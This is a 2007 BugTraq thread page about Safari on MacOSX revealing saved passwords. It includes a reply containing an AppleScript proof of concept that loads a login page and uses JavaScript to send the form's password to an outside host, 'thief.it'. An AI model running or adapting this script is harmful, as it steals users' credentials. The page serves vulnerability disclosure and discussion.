|
|
BugTraq
Re: RE: Apple Safari on MacOSX may reveal user's saved passwords May 14 2007 10:35PM poplix papuasia org (1 replies) Re: Apple Safari on MacOSX may reveal user's saved passwords May 15 2007 10:15PM David Cantrell (d cantrell outcometechnologies com) (1 replies) Re: Apple Safari on MacOSX may reveal user's saved passwords May 16 2007 05:42PM graham coles the-logic-group com (2 replies) Re: Apple Safari on MacOSX may reveal user's saved passwords May 17 2007 11:47AM David Cantrell (d cantrell outcometechnologies com) (2 replies) Re: Apple Safari on MacOSX may reveal user's saved passwords May 17 2007 05:50PM graham coles the-logic-group com (1 replies) Re: Apple Safari on MacOSX may reveal user's saved passwords May 18 2007 01:23PM poplix (poplix papuasia org) (1 replies) Re: Apple Safari on MacOSX may reveal user's saved passwords May 18 2007 05:13PM Kevin Finisterre (lists) (kf_lists digitalmunition com) (1 replies) Re: Apple Safari on MacOSX may reveal user's saved passwords May 18 2007 11:43PM poplix (poplix papuasia org) Re: Apple Safari on MacOSX may reveal user's saved passwords May 17 2007 04:49PM Mark Senior (senatorfrog gmail com) Re: Apple Safari on MacOSX may reveal user's saved passwords May 16 2007 07:21PM Ian Ward Comfort (icomfort rescomp stanford edu) |
|
Privacy Statement |
--BOF
tell application "Safari"
open location "https://www.target.com"
end tell
do shell script "/bin/sleep 10"
tell application "Safari"
do JavaScript "document.location.href='http://thief.it/steal_target?p='+document.login
form.password.value" in document 1
end tell
--EOF
I agree with you in saying that the execution of malicious scripts can lead in much more dangeruos attacks, anyway i consider this a vulnerability and i dont know why Apple belives this is the correct behaviour. . .
many thanks for your comment
-p
[ reply ]